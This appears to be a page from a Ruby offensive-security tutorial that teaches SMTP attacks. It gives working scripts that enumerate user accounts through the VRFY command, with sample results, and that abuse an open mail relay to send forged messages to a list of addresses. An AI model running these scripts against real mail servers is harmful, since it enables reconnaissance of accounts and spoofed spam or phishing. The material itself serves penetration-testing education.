SMTP Enumeration

Twitter Github NEW! Black Hat Ruby Buy Me a Coffee
Search…
SMTP Enumeration
SMTP email address enumeration
Interacting with SMTP is easy and since the protocol is straight forward. We can use the VRFY command to check if an email address exists or not:
1
#!/usr/bin/env ruby
2
# KING SABRI | @KINGSABRI
3
#
4
require 'socket'
5
​
6
users =
7
    %w{
8
        root rubyfu www apache2 bin daemon sshd
9
        gdm  nobody ftp operator postgres mysqld
10
      }
11
found = []
12
​
13
@s = TCPSocket.new('192.168.0.19', 25)
14
@banner = @s.recv(1024).chomp
15
users.each do |user|
16
  @s.send "VRFY #{user} \n\r", 0
17
  resp = @s.recv(1024).chomp
18
  found << user if resp.split[2] == user
19
end
20
@s.close
21
​
22
puts "[*] Result:-"
23
puts "[+] Banner: " + @banner
24
puts "[+] Found users: \n#{found.join("\n")}"
Copied!
Results
1
[*] Result:-
2
[+] Banner: 220 VulnApps.localdomain ESMTP Postfix
3
[+] Found users: 
4
root
5
rubyfu
6
www
7
bin
8
daemon
9
sshd
10
gdm
11
nobody
12
ftp
13
operator
14
postgres
Copied!
Your turn, there are other commands that can be used such as EXPN, RCPT. Enhance the above script to include all these commands to avoid restricted commands that might you face. More SMTP commands are listed here.
SMTP open relay abuse
SMTP not protected by authentication can be abused to send emails from anyone:
1
#!/usr/bin/env ruby
2
​
3
require 'socket'
4
​
5
users = File.read('emails.txt').split("\n")
6
​
7
@s = TCPSocket.new('example.org', 25)
8
@banner = @s.recv(1024).chomp
9
users.each do |user|
10
  @s.send "MAIL from:[email protected] \n\r", 0
11
  @s.send "RCPT to:#{user} \n\r", 0
12
  @s.send "DATA \n\r", 0
13
  @s.send "email body here \r\n.\r\n", 0
14
  resp = @s.recv(1024).chomp
15
  puts resp
16
end
17
@s.close
18
​
19
puts "[*] Result:-"
20
puts "[+] Banner: " + @banner
Copied!
Network Scanning
Last modified 7mo ago
Copy link
Contents
SMTP email address enumeration
SMTP open relay abuse